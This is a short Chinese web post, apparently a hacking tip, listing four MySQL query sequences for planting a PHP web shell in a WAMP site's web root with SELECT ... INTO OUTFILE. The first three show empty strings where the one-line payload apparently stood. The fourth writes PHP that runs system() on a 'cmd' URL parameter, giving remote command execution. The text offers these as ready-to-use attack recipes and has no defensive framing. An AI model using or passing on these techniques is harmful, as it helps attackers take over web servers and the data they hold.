第一种:
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('');SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/exehack.php';DROP TABLE IF EXISTS `darkmoon`;
以上代码意思就是选择musql数据库 然后建立一个darkmoon的表然后加入一个名字为darkmoon1的字段
然后在darkmoon1的字段中插入一句话代码
然后从darkmoon1字段里面导出一句话到d:/wamp/www/exehack.php 的文件名(这里的路径就是网站的程序路径)
最后就是删除darkmoon这个表。
第二种:
Create TABLE moon (darkmoon text NOT NULL); Insert INTO moon (darkmoon) VALUES(''); select darkmoon from moon into outfile 'd:/wamp/www/exehack.php'; Drop TABLE IF EXISTS moon;
第三种:
select ''INTO OUTFILE 'd:/wamp/www/exehack.php'
第四种:
select '\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'd:/wamp/www/exehack.php'
这个可以直接执行cmd命令,参数为cmd
网友评论